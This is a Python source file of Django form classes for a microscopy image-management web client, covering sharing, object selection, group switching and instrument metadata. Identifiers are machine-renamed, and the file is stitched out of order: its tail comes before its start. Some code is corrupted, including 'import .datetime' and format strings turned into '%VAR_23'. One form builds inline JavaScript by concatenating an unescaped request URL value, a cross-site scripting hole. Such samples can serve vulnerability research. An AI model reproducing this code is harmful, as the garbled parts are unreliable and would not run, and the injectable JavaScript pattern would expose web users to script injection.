if VAR_41.getLightSourceType() is not None:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
initial=VAR_41.getLightSourceType().value,
required=False,
)
else:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
except Exception:
self.fields["lstype"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
try:
VAR_45 = VAR_41.getPump()
VAR_46 = VAR_45.OMERO_CLASS # E.g. 'Arc'
VAR_47 = VAR_45.getModel()
VAR_48 = "%VAR_23: %s" % (VAR_46, VAR_47)
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial=VAR_48,
required=False,
)
except Exception:
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pump"])
try:
if VAR_41.getLaserMedium() is not None:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
initial=VAR_41.getLaserMedium().value,
label="Medium",
required=False,
)
else:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
except Exception:
self.fields["lmedium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
try:
if (
VAR_42 is not None
and VAR_42.wavelength is not None
):
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_42.wavelength.getValue(),
label=(
"Wavelength (%VAR_23)" % VAR_42.wavelength.getSymbol()
),
required=False,
)
elif VAR_41.wavelength is not None:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_41.wavelength.getValue(),
label=("Wavelength (%VAR_23)" % VAR_41.wavelength.getSymbol()),
required=False,
)
else:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
required=False,
)
FUNC_1(self.fields["wavelength"])
except Exception:
self.fields["wavelength"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["wavelength"])
try:
if VAR_41.frequencyMultiplication is not None:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
initial=VAR_41.frequencyMultiplication,
label="Frequency Multiplication",
required=False,
)
else:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
except Exception:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
try:
if VAR_41.tuneable is not None:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
initial=VAR_41.tuneable,
required=False,
)
else:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["tuneable"])
except Exception:
self.fields["tuneable"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["tuneable"])
try:
if VAR_41.pulse is not None:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
initial=VAR_41.pulse,
required=False,
)
else:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["pulse"])
except Exception:
self.fields["pulse"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pulse"])
try:
if VAR_41.repetitionRate is not None:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
initial=VAR_41.repetitionRate.getValue(),
label=(
"Repetition rate (%VAR_23)" % VAR_41.repetitionRate.getSymbol()
),
required=False,
)
else:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
except Exception:
self.fields["repetitionRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
try:
if VAR_41.pockelCell is not None:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
initial=VAR_41.pockelCell,
label="Pockel Cell",
required=False,
)
else:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
except Exception:
self.fields["pockelCell"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
if (
VAR_42 is not None
and VAR_42.attenuation is not None
):
self.fields["attenuation"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_42.id, "attenuation"
),
}
),
initial=formatPercentFraction(VAR_42.attenuation),
label="Attenuation (%)",
required=False,
)
else:
self.fields["attenuation"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["attenuation"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"power",
"lstype",
"pump",
"lmedium",
"wavelength",
"frequencyMultiplication",
"tuneable",
"pulse",
"repetitionRate",
"pockelCell",
"attenuation",
]
class CLASS_21(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_21, self).__init__(*VAR_11, **VAR_12)
VAR_43 = VAR_12["initial"]["image"].getImagingEnvironment()
try:
if VAR_43.temperature is not None:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
initial=VAR_43.temperature.getValue(),
label=("Temperature (%VAR_23)" % VAR_43.temperature.getSymbol()),
required=False,
)
else:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
required=False,
)
FUNC_1(self.fields["temperature"])
except Exception:
self.fields["temperature"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["temperature"])
try:
if VAR_43.airPressure is not None:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
initial=VAR_43.airPressure.getValue(),
label=("Air Pressure (%VAR_23)" % VAR_43.airPressure.getSymbol()),
required=False,
)
else:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
label="Air Pressure",
required=False,
)
FUNC_1(self.fields["airPressure"])
except Exception:
self.fields["airPressure"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
label="Air Pressure",
initial="N/A",
required=False,
)
FUNC_1(self.fields["airPressure"])
try:
if VAR_43.humidity is not None:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
initial=VAR_43.humidity,
required=False,
)
else:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
required=False,
)
FUNC_1(self.fields["humidity"])
except Exception:
self.fields["humidity"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["humidity"])
try:
if VAR_43.co2percent is not None:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
initial=VAR_43.co2percent,
label="CO2 (%)",
required=False,
)
else:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
except Exception:
self.fields["co2percent"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class CLASS_22(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_22, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionx,
label="Position X",
required=False,
)
else:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
except Exception:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positiony,
label="Position Y",
required=False,
)
else:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
label="Position Y",
required=False,
)
FUNC_1(self.fields["positiony"])
except Exception:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Y",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionz,
label="Position Z",
required=False,
)
else:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
except Exception:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
self.fields.keyOrder = ["positionx", "positiony", "positionz"]
|
import .datetime
import time
import logging
from django.conf import .settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
VAR_0 = logging.getLogger(__name__)
VAR_1 = "%swebgateway/img/help16.png" % settings.STATIC_URL
VAR_2 = (
'<span class="tooltip" title="Enable/Disable: This option'
' allows the VAR_17 to keep the access control of the share.">'
'<img src="%s" /></span>'
) % VAR_1
VAR_3 = (
'<span class="tooltip" title="Expiry VAR_49: This VAR_49 defines'
" when the share will stop being available. Date format:"
' YYYY-MM-DD."><img src="%s" /></span>'
) % VAR_1
class CLASS_0(NonASCIIForm):
VAR_10 = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class CLASS_1(NonASCIIForm):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_1, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["shareMembers"]:
pass
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=VAR_12["initial"]["experimenters"],
initial=VAR_12["initial"]["shareMembers"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
except Exception:
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=VAR_12["initial"]["experimenters"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
self.fields.keyOrder = [
"message",
"expiration",
"enable",
"members",
] # , 'guests']
VAR_13 = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
VAR_14 = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 10}),
label="Expiry date",
help_text=VAR_3,
required=False,
)
VAR_15 = forms.BooleanField(required=False, help_text=VAR_2)
def FUNC_2(self):
if (
self.cleaned_data["expiration"] is not None
and len(self.cleaned_data["expiration"]) < 1
):
return None
if self.cleaned_data["expiration"] is not None:
VAR_44 = str(self.cleaned_data["expiration"]).rsplit("-")
try:
VAR_49 = datetime.datetime.strptime(
("%VAR_23-%s-%s" % (VAR_44[0], VAR_44[1], VAR_44[2])), "%Y-%m-%d"
)
except Exception:
raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
if time.mktime(VAR_49.timetuple()) <= time.time():
raise forms.ValidationError("Expiry VAR_49 must be in the future.")
return self.cleaned_data["expiration"]
class CLASS_2(NonASCIIForm):
VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
VAR_16 = forms.CharField(
widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
)
VAR_17 = forms.CharField(widget=forms.HiddenInput, required=False)
class CLASS_3(NonASCIIForm):
VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class CLASS_4(NonASCIIForm):
VAR_16 = forms.CharField(
widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
)
class CLASS_5(NonASCIIForm):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_5, self).__init__(*VAR_11, **VAR_12)
VAR_25 = "images" in VAR_12["initial"] and VAR_12["initial"]["images"] or list()
if len(VAR_25) > 0:
try:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=VAR_25,
initial=VAR_12["initial"]["selected"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=VAR_25,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_26 = (
"datasets" in VAR_12["initial"] and VAR_12["initial"]["datasets"] or list()
)
if len(VAR_26) > 0:
try:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=VAR_26,
initial=VAR_12["initial"]["selected"]["datasets"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=VAR_26,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_27 = (
"projects" in VAR_12["initial"] and VAR_12["initial"]["projects"] or list()
)
if len(VAR_27) > 0:
try:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=VAR_27,
initial=VAR_12["initial"]["selected"]["projects"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=VAR_27,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_28 = (
"screens" in VAR_12["initial"] and VAR_12["initial"]["screens"] or list()
)
if len(VAR_28) > 0:
try:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=VAR_28,
initial=VAR_12["initial"]["selected"]["screens"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=VAR_28,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_29 = "plates" in VAR_12["initial"] and VAR_12["initial"]["plates"] or list()
if len(VAR_29) > 0:
try:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=VAR_29,
initial=VAR_12["initial"]["selected"]["plates"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=VAR_29,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_30 = (
"acquisitions" in VAR_12["initial"]
and VAR_12["initial"]["acquisitions"]
or list()
)
if len(VAR_30) > 0:
try:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=VAR_30,
initial=VAR_12["initial"]["selected"]["acquisitions"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=VAR_30,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_31 = "wells" in VAR_12["initial"] and VAR_12["initial"]["wells"] or list()
if len(VAR_31) > 0:
try:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=VAR_31,
initial=VAR_12["initial"]["selected"]["wells"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=VAR_31,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_32 = "shares" in VAR_12["initial"] and VAR_12["initial"]["shares"] or list()
if len(VAR_32) > 0:
try:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=VAR_32,
initial=VAR_12["initial"]["selected"]["shares"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=VAR_32,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
class CLASS_6(CLASS_5):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_6, self).__init__(*VAR_11, **VAR_12)
VAR_18 = forms.CharField(required=False, widget=forms.HiddenInput)
def FUNC_3(self):
VAR_33 = self.cleaned_data["tags"]
if not VAR_33:
return []
try:
VAR_33 = map(int, VAR_33.split(","))
except Exception:
raise forms.ValidationError()
return VAR_33
class CLASS_7(forms.Form):
VAR_19 = forms.CharField(required=True, widget=forms.HiddenInput)
VAR_16 = forms.CharField(required=False, widget=forms.HiddenInput)
VAR_20 = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)
VAR_4 = formset_factory(CLASS_7, extra=0)
class CLASS_8(CLASS_5):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_8, self).__init__(*VAR_11, **VAR_12)
self.fields["files"] = AnnotationModelMultipleChoiceField(
queryset=VAR_12["initial"]["files"],
widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
required=False,
)
VAR_21 = forms.FileField(required=False)
class CLASS_9(CLASS_5):
VAR_22 = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class CLASS_10(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_10, self).__init__(*VAR_11, **VAR_12)
try:
self.fields["active_group"] = GroupModelChoiceField(
queryset=VAR_12["initial"]["mygroups"],
initial=VAR_12["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?url="
+ VAR_12["initial"]["url"]
+ "&active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
except Exception:
self.fields["active_group"] = GroupModelChoiceField(
queryset=VAR_12["initial"]["mygroups"],
initial=VAR_12["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
self.fields.keyOrder = ["active_group"]
class CLASS_11(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_11, self).__init__(*VAR_11, **VAR_12)
VAR_34, VAR_35 = VAR_12["initial"]["range"]
VAR_36 = [(str(i), "Field#%i" % (i - VAR_34 + 1)) for i in range(VAR_34, VAR_35 + 1)]
self.fields["index"] = forms.ChoiceField(
VAR_36=tuple(VAR_36),
widget=forms.Select(
attrs={
"onchange": ("changeField(this.options[this.selectedIndex].value);")
}
),
)
self.fields.keyOrder = ["index"]
def FUNC_0(VAR_5, VAR_6, VAR_7=False):
VAR_23 = "javascript:FUNC_0(" + str(VAR_5) + ", '" + VAR_6 + "', "
if VAR_7:
VAR_23 += "this.options[this.selectedIndex].value);"
else:
VAR_23 += "this.value);"
return VAR_23
def FUNC_1(VAR_8, VAR_9=True):
VAR_8.widget.attrs["disabled"] = True
if VAR_9:
VAR_8.widget.attrs["class"] = "disabled-metadata"
class CLASS_12(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_12, self).__init__(*VAR_11, **VAR_12)
VAR_37 = VAR_12["initial"]["logicalChannel"]
try:
if VAR_37 is not None:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_37.id)}
),
initial=VAR_37.name,
required=False,
)
else:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
required=False,
)
FUNC_1(self.fields["name"])
except Exception:
self.fields["name"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["name"])
try:
if VAR_37 is not None:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_12["initial"]["exWave"].getValue(),
label=("Excitation (%VAR_23)" % VAR_12["initial"]["exWave"].getSymbol()),
required=False,
)
else:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Excitation",
required=False,
)
FUNC_1(self.fields["excitationWave"])
except Exception:
self.fields["excitationWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Excitation",
required=False,
)
FUNC_1(self.fields["excitationWave"])
try:
if VAR_37 is not None:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_12["initial"]["emWave"].getValue(),
label=("Emission (%VAR_23)" % VAR_12["initial"]["emWave"].getSymbol()),
required=False,
)
else:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Emission",
required=False,
)
FUNC_1(self.fields["emissionWave"])
except Exception:
self.fields["emissionWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Emission",
required=False,
)
FUNC_1(self.fields["emissionWave"])
try:
if VAR_37 is not None and VAR_37.ndFilter is not None:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=formatPercentFraction(VAR_37.ndFilter),
label="ND filter (%)",
required=False,
)
else:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="ND filter (%)",
required=False,
)
FUNC_1(self.fields["ndFilter"], VAR_9=False)
except Exception:
self.fields["ndFilter"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="ND filter (%)",
required=False,
)
FUNC_1(self.fields["ndFilter"], VAR_9=False)
try:
if VAR_37 is not None and VAR_37.pinHoleSize is not None:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.pinHoleSize.getValue(),
label=("Pin hole size (%VAR_23)" % VAR_37.pinHoleSize.getSymbol()),
required=False,
)
else:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Pin hole size",
required=False,
)
FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
except Exception:
self.fields["pinHoleSize"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pin hole size",
required=False,
)
FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
try:
if VAR_37 is not None:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.fluor,
required=False,
)
else:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
required=False,
)
FUNC_1(self.fields["fluor"], VAR_9=False)
except Exception:
self.fields["fluor"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["fluor"], VAR_9=False)
try:
if VAR_37.getIllumination() is not None:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "illumination", VAR_7=True
)
}
),
initial=VAR_37.getIllumination(),
required=False,
)
else:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "illumination", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["illumination"], VAR_9=False)
except Exception:
self.fields["illumination"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["illumination"], VAR_9=False)
try:
if VAR_37.contrastMethod is not None:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "contrastMethod", VAR_7=True
)
}
),
initial=VAR_37.getContrastMethod(),
label="Contrast method",
required=False,
)
else:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "contrastMethod", VAR_7=True
)
}
),
label="Contrast method",
required=False,
)
FUNC_1(self.fields["contrastMethod"])
except Exception:
self.fields["contrastMethod"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Contrast method",
required=False,
)
FUNC_1(self.fields["contrastMethod"])
try:
if VAR_37.getMode() is not None:
